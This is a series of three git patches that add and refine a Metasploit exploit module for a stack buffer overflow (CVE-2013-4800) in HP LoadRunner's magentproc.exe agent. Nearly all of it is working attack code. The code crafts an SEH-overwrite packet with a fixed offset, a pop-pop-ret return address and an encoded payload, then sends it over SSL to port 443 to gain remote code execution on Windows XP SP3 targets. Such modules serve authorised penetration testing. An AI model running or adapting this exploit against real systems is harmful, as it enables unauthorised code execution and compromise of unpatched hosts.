From 39eb20e33a9b94042250c2cce821be2d2e0f4c30 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 3 Oct 2013 16:52:20 -0500 Subject: [PATCH 1/3] Add module for ZDI-13-169 --- .../windows/misc/hp_loadrunner_magentproc.rb | 82 +++++++++++++++++++ 1 file changed, 82 insertions(+) create mode 100644 modules/exploits/windows/misc/hp_loadrunner_magentproc.rb diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb new file mode 100644 index 0000000000..b1e228d22c --- /dev/null +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -0,0 +1,82 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'HP LoadRunner magentproc.exe Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The + vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending + a specially crafted packet, an attacker may be able to execute arbitrary code. + }, + 'Author' => + [ + 'Unknown', # Original discovery # From Tenable Network Security + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2013-4800'], + ['OSVDB', '95644'], + ['http://www.zerodayinitiative.com/advisories/ZDI-13-169/'] + ], + 'Privileged' => false, + 'DefaultOptions' => + { + 'EXITFUNC' => 'seh', + 'SSL' => true, + 'SSLVersion' => 'SSL3' + }, + 'Payload' => + { + 'Space' => 5724, # without rop chain + 'StackAdjustment' => -3500, + 'BadChars' => "\x00" + }, + 'Platform' => 'win', + 'DefaultTarget' => 0, + 'Targets' => + [ + [ + 'Windows XP SP3 / HP LoadRunner 11.50', + { + # magentproc.exe 11.0.0.1002 + 'Offset' => 1104, + 'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates + 'Crash' => 10000 # Length needed to ensure an exception + } + ] + ], + 'DisclosureDate' => 'Jul 27 2013')) + + register_options([Opt::RPORT(443)], self.class) + end + + def exploit + + req = [0xffffffff].pack("N") # Fake Length + req << rand_text(target['Offset']) + req << generate_seh_record(target.ret) + req << payload.encoded + req << rand_text(target['Crash']) + + connect + print_status("sending 1") + sock.put(req) + disconnect + + end +end From 5971fe87f5f6120bb2ba5386e364a780e5568ed8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 3 Oct 2013 17:19:53 -0500 Subject: [PATCH 2/3] Improve reliability --- .../windows/misc/hp_loadrunner_magentproc.rb | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index b1e228d22c..ba0af35247 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -36,15 +36,16 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => false, 'DefaultOptions' => { - 'EXITFUNC' => 'seh', 'SSL' => true, - 'SSLVersion' => 'SSL3' + 'SSLVersion' => 'SSL3', + 'PrependMigrate' => true }, 'Payload' => { - 'Space' => 5724, # without rop chain - 'StackAdjustment' => -3500, - 'BadChars' => "\x00" + 'Space' => 4096, + 'DisableNops' => true, + 'BadChars' => "\x00", + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Platform' => 'win', 'DefaultTarget' => 0, @@ -56,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote # magentproc.exe 11.0.0.1002 'Offset' => 1104, 'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates - 'Crash' => 10000 # Length needed to ensure an exception + 'Crash' => 6000 # Length needed to ensure an exception } ] ], @@ -74,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote req << rand_text(target['Crash']) connect - print_status("sending 1") + print_status("Sending malicious request...") sock.put(req) disconnect From 646429b4dd0fd705cb40265a2fa777a1a6a10add Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 3 Oct 2013 22:15:17 -0500 Subject: [PATCH 3/3] Put ready to pull request --- modules/exploits/windows/misc/hp_loadrunner_magentproc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb index ba0af35247..a028d0f990 100644 --- a/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb +++ b/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP3 / HP LoadRunner 11.50', { - # magentproc.exe 11.0.0.1002 + # magentproc.exe 11.50.2042.0 'Offset' => 1104, 'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates 'Crash' => 6000 # Length needed to ensure an exception